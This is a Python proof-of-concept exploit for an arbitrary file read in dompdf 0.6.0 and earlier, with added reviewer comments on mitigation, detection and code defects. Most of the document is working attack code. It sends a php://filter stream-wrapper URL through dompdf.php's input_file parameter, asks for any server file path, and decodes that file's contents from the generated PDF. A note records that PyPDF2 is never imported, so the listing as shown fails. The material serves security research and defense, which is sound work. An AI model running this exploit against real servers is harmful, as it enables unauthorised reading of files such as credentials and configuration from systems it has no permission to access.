#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#########################################################
## POC exploit for <= 0.6.0 dompdf - Arbitrary File Read
#########################################################
## Author: Drew 'farbs' Farber
## Copyright: Copyright 2020, <= 0.6.0 dompdf AFR POC
## License: MIT
#########################################################
# What this script demonstrates (reviewer / defender summary):
#   dompdf's own entry script (/dompdf/dompdf.php) is reached directly over
#   HTTP, and its `input_file` query parameter is given a `php://filter/...`
#   stream-wrapper URL instead of a plain document path. The server then
#   base64-encodes the named file and renders that text into the returned
#   PDF, which this script parses and decodes.
#   Mitigation: do not expose the library's entry scripts under the web root,
#   and run a dompdf release that no longer accepts an unrestricted
#   `input_file` (the header above states <= 0.6.0 is affected).
#   Detection: requests to dompdf.php whose `input_file` value begins with
#   `php://` (or any other stream wrapper) are a clear indicator of this
#   technique and are worth alerting on.
# NOTE(review): `PyPDF2` is referenced below (PdfFileReader, isEncrypted,
#   getPage, extractText) but is never imported in this listing, so the
#   script as shown fails with NameError at its first PyPDF2 use.
# The 'requests' version used here requires the chardet package to be installed; the version must be chardet <4, >=3.0.2.
# To install: python3 -m pip install "chardet==3.0.3"
import sys
import requests
import io
import base64
import warnings
# Ignore UserWarning due to occasional trailing whitespace during pdf to byte conversion
warnings.filterwarnings("ignore", category=UserWarning)
# Get the URL from the command line arguments
try:
    url = str(sys.argv[1])
except IndexError:
    print('Error: No URL supplied.\nExample: python3 dompdf_poc.py http://example.com')
    # NOTE(review): sys.exit() without an argument exits with status 0, so a
    # caller or wrapper script cannot tell this error from success.
    sys.exit()
# Check if /dompdf.php is accessible
# NOTE(review): no `timeout=` is passed to requests.get, so an unresponsive
# host blocks indefinitely; `url` is also used verbatim (a trailing slash
# would produce a double slash in the path).
r = requests.get(f"{url}/dompdf/dompdf.php", allow_redirects=False)
# A 500 is accepted alongside 200 — presumably because dompdf.php errors out
# when called with no parameters, which still proves the script exists; confirm.
if r.status_code in [200, 500]:
    # Get the file path for retrieval
    file_path = input("Enter file path for retrieval: ")
    # Download the file
    # `file_path` is interpolated unencoded into the query string; the
    # php://filter wrapper makes the server hand the file back base64-encoded.
    downfile = requests.get(f"{url}/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource={file_path}")
    raw_data = downfile.content
    pdf_data = io.BytesIO(raw_data)
    # Read the PDF file
    pdf_reader = PyPDF2.PdfFileReader(pdf_data)
    # Decode the base64 data
    if pdf_reader.isEncrypted:
        # Empty-password decrypt; apart from this call the two branches below
        # are identical and could share a single decode path.
        pdf_reader.decrypt("")
        # Only page 0 is read, so content that spills onto later pages is dropped.
        b64 = pdf_reader.getPage(0).extractText().encode('ascii')
        b64_output = b64.decode('ascii')
        output = base64.b64decode(b64_output)
        # Strict UTF-8 decode: binary or non-UTF-8 files raise UnicodeDecodeError here (unhandled).
        byte_output = str(output, 'utf-8')
        # Turn literal two-character "\n" sequences in the extracted text into real newlines.
        formatted_output = byte_output.replace('\\n', '\n')
        print(formatted_output)
    else:
        # Same decode sequence as the encrypted branch, without the decrypt call.
        b64 = pdf_reader.getPage(0).extractText().encode('ascii')
        b64_output = b64.decode('ascii')
        output = base64.b64decode(b64_output)
        # Strict UTF-8 decode: binary or non-UTF-8 files raise UnicodeDecodeError here (unhandled).
        byte_output = str(output, 'utf-8')
        formatted_output = byte_output.replace('\\n', '\n')
        print(formatted_output)
    print(f"File '{file_path}' extracted successfully.")
elif r.status_code == 404:
    print("Error: Received 404 Error Code. Did you fat-finger the URL?")
    # NOTE(review): exits with status 0 despite being an error path (see above).
    sys.exit()
else:
    # Any other status (e.g. 401/403 or a redirect, since allow_redirects=False)
    # lands here; the code itself is not printed, which makes triage harder.
    print(f"Error: URL {url} returned unexpected status code. Exiting...")
    sys.exit()